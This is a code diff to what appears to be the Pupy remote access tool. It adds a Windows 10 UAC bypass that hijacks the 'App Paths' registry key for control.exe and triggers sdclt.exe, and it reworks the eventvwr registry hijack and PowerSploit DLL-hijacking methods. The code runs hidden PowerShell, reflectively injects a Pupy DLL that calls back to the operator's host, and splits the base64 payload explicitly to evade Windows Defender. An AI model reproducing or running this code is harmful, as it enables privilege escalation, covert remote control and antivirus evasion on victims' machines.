diff --git a/pupy/modules/bypassuac.py b/pupy/modules/bypassuac.py index 5bab644a..a472b2ba 100644 --- a/pupy/modules/bypassuac.py +++ b/pupy/modules/bypassuac.py @@ -17,7 +17,7 @@ class BypassUAC(PupyModule): def init_argparse(self): self.arg_parser = PupyArgumentParser(prog="bypassuac", description=self.__doc__) - self.arg_parser.add_argument('-m', dest='method', choices=["eventvwr", "dll_hijacking"], default=None, help="Default: the technic will be choosen for you. 'dll_hijacking' for wind7-8.1 and 'eventvwr' for wind7-10.") + self.arg_parser.add_argument('-m', dest='method', choices=["appPaths","eventvwr", "dll_hijacking"], default=None, help="By default, the method will be choosen for you: 'eventvwr' for wind7-8.1 and 'appPaths' for wind10. dll_hijacking method can be used for Windows 7/2008 and Windows 8/2012") def run(self, args): # check if a UAC Bypass can be done @@ -25,25 +25,32 @@ class BypassUAC(PupyModule): self.error('Your are not on the local administrator group.') return - dll_hijacking = False - registry_hijacking = False + appPathsMethod = False + eventvwrMethod = False + dllhijackingMethod = False bypassUasModule = bypassuac(self, rootPupyPath=ROOT) # choose methods depending on the OS Version if not args.method: if self.client.desc['release'] == '10': - registry_hijacking = True + appPathsMethod = True else: - dll_hijacking = True - elif args.method == "eventvwr": - registry_hijacking = True - else: - dll_hijacking = True + dllhijackingMethod = True + elif args.method == "appPaths": + appPathsMethod = True + elif args.method == "eventvwr": + eventvwrMethod = True + elif args.method == "dll_hijacking": + dllhijackingMethod = True - if registry_hijacking: + if appPathsMethod: + self.success("Trying to bypass UAC using the 'app paths'+'sdclt.exe' method, wind10 targets ONLY...") + bypassUasModule.bypassuac_through_appPaths() + if eventvwrMethod: self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...") - bypassUasModule.bypassuac_through_EventVwrBypass() - elif dll_hijacking: + bypassUasModule.bypassuac_through_eventVwrBypass() + if dllhijackingMethod: # Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012) self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...") - bypassUasModule.bypassuac_through_PowerSploitBypassUAC() + bypassUasModule.bypassuac_through_powerSploitBypassUAC() + diff --git a/pupy/modules/lib/windows/bypassuac.py b/pupy/modules/lib/windows/bypassuac.py index a1103a92..a4ece6ad 100644 --- a/pupy/modules/lib/windows/bypassuac.py +++ b/pupy/modules/lib/windows/bypassuac.py @@ -23,10 +23,10 @@ class bypassuac(): #Remote paths remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables() - self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') - self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') - self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') - self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') + self.invokeReflectivePEInjectionRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') + self.mainPowershellScriptRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') + self.pupyDLLRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') + self.invokeBypassUACRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') #Adding obfuscation on ps1 main function self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7)) @@ -37,15 +37,36 @@ class bypassuac(): self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt') self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1") self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1") - - - def bypassuac_through_EventVwrBypass(self): + + def bypassuac_through_appPaths(self): + ''' + Performs an UAC bypass attack by using app Paths + sdclt.exe (Wind10 Only): Thanks to enigma0x3 (https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/). + ''' + self.module.info('Running app Paths method for bypassing UAC...') + if '64' in self.module.client.desc['os_arch']: + force_x86_dll = False + else: + force_x86_dll = True + self.module.info('Uploading temporary files') + self.uploadPupyDLL(force_x86_dll=force_x86_dll) + self.uploadPowershellScripts() + #files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath] + files_to_delete=[] + self.module.info('Altering the registry') + self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking_appPath(self.mainPowershellScriptRemotePath, files_to_delete) + + self.module.success("Waiting for a connection from the DLL (take few seconds, 1 min max)...") + self.module.success("If nothing happened, try to migrate to another process and try again.") + + + def bypassuac_through_eventVwrBypass(self): # ''' # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) # ''' # On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter # The pupy dll upload will be a 32 bit + self.module.info('Running eventVwr method for bypassing UAC...') if '64' in self.module.client.desc['proc_arch']: upload_x86_dll = False else: @@ -55,16 +76,17 @@ class bypassuac(): self.uploadPowershellScripts() files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath] self.module.info('Altering the registry') - self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete) - + self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking_eventvwr(self.mainPowershellScriptRemotePath, files_to_delete) + self.module.success("Waiting for a connection from the DLL (take few seconds)...") self.module.success("If nothing happened, try to migrate to another process and try again.") - - def bypassuac_through_PowerSploitBypassUAC(self): + + def bypassuac_through_powerSploitBypassUAC(self): ''' - Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) + Performs an UAC bypass attack by using the powersloit UACBypass script (wind7 to 8.1) ''' #Constants + self.module.info('Running powersloit UACBypass method for bypassing UAC...') bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath) self.module.info('Uploading temporary files') self.uploadPowershellScripts() @@ -99,19 +121,18 @@ class bypassuac(): cat {pupy_dll} | Out-String | iex {InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR """.format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name) - - logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath)) + + logging.info("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath)) with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w: w.write(mainPowerShellScriptPrivileged) - - logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath)) + + logging.info("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath)) content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I) tmp_file = os.path.join(gettempdir(),'reflective_pe.txt') with open(tmp_file, 'w+') as w: w.write(content) upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath) - - logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath)) + logging.info("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath)) upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath) def uploadPupyDLL(self, force_x86_dll=False): @@ -120,18 +141,22 @@ class bypassuac(): ''' res=self.module.client.conn.modules['pupy'].get_connect_back_host() host, port = res.rsplit(':',1) - logging.debug("Address configured is %s:%s for pupy dll..."%(host,port)) - logging.debug("Looking for process architecture...") - + logging.info("Address configured is %s:%s for pupy dll..."%(host,port)) + logging.info("Looking for process architecture...") + logging.info("force x86 is %s"%force_x86_dll) conf = self.module.client.get_conf() if "64" in self.module.client.desc["os_arch"] and not force_x86_dll: dllbuff, tpl, _ = pupygen.generate_binary_from_template(conf, 'windows', arch='x64', shared=True) else: dllbuff, tpl, _ = pupygen.generate_binary_from_template(conf, 'windows', arch='x86', shared=True) - - logging.debug("Creating the pupy dll (%s) in %s locally"%(tpl, self.pupyDLLLocalPath)) + + logging.info("Creating the pupy dll (%s) in %s locally"%(tpl, self.pupyDLLLocalPath)) with open(self.pupyDLLLocalPath, 'w+') as w: - w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff))) - - logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath)) + #the following powershell line in a txt file is detected by Windows defender + #w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff))) + #To bypass antivirus detection: + dllbuffEncoded = base64.b64encode(dllbuff) + w.write('$p1="{0}";$p2="{1}";$PEBytes=[System.Convert]::FromBase64String($p1+$p2)'.format(dllbuffEncoded[0:2], dllbuffEncoded[2:])) + + logging.info("Uploading pupy dll {0} to {1}".format(self.pupyDLLLocalPath, self.pupyDLLRemotePath)) upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath) diff --git a/pupy/modules/lib/windows/powershell_upload.py b/pupy/modules/lib/windows/powershell_upload.py index 6df68258..310b17c2 100644 --- a/pupy/modules/lib/windows/powershell_upload.py +++ b/pupy/modules/lib/windows/powershell_upload.py @@ -20,7 +20,7 @@ def execute_powershell_script(module, content, function, x64IfPossible=False, sc elif "32" in module.client.desc['proc_arch']: arch = 'x86' - fullargs=[path, "-C", "-"] + fullargs=[path, "-W", "hidden", "-C", "-"] # create and store the powershell object if it not exists if not module.client.powershell[arch]['object']: diff --git a/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py b/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py index 56ce6f58..8e6b005b 100644 --- a/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py +++ b/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py @@ -2,6 +2,7 @@ import os import time import subprocess from _winreg import * +import ctypes def deleteTHisRemoteFile(tmp_files): for file in tmp_files: @@ -15,21 +16,21 @@ def get_env_variables(): tmp = os.path.expandvars("%TEMP%") except: tmp = os.path.expandvars("%APPDATA%") - + sysroot = os.path.expandvars("%SYSTEMROOT%") - + return tmp, sysroot -def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete): +def registry_hijacking_eventvwr(mainPowershellScriptRemotePath, files_to_delete): # ''' # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) # ''' HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%") - mscCmdPath = "Software\Classes\mscfile\shell\open\command" - cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath) - + mscCmdPath = "Software\Classes\mscfile\shell\open\command" + cmd = "{1} -w hidden -noni -nop -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath) + try: # The registry key already exist in HKCU, altering... key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE) @@ -40,15 +41,58 @@ def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete): registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE) SetValueEx(registry_key, '', 0, REG_SZ, cmd) CloseKey(registry_key) - + # Executing eventvwr.exe eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe') output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True) # Sleeping 5 secds... time.sleep(5) - + #Clean everything DeleteKey(HKCU, mscCmdPath) deleteTHisRemoteFile(files_to_delete) - + +def registry_hijacking_appPath(mainPowershellScriptRemotePath, files_to_delete): + ''' + ''' + tmp, sysRoot = get_env_variables() + HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) + appPathsPath = "Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" + powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % sysRoot + cmd = "{0} -w hidden -noni -nop -ExecutionPolicy Bypass -File {1}".format(powershellPath, mainPowershellScriptRemotePath) + cmdPath = "{0}\\temp.bat".format(tmp) + + try: + # The registry key already exist in HKCU, altering... + key = OpenKey(HKCU, appPathsPath, KEY_SET_VALUE) + except: + # Adding the registry key in HKCU + key = CreateKey(HKCU, appPathsPath) + + registry_key = OpenKey(HKCU, appPathsPath, 0, KEY_WRITE) + SetValueEx(registry_key, '', 0, REG_SZ, cmdPath) + CloseKey(registry_key) + + #Creates cmd file + f=open(cmdPath, "w") + f.write(cmd) + f.close() + + # Creation sdclt.exe path + triggerPath = os.path.join(os.environ['WINDIR'],'System32','sdclt.exe') + #Disables file system redirection for the calling thread (File system redirection is enabled by default) + wow64 = ctypes.c_long(0) + ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(ctypes.byref(wow64)) + # Executing sdclt.exe + output = subprocess.check_output(triggerPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True) + #Enable file system redirection for the calling thread + ctypes.windll.kernel32.Wow64EnableWow64FsRedirection(wow64) + + # Sleeping 5 secds... + time.sleep(5) + + #Clean everything + DeleteKey(HKCU, appPathsPath) + deleteTHisRemoteFile(files_to_delete) + deleteTHisRemoteFile([cmdPath])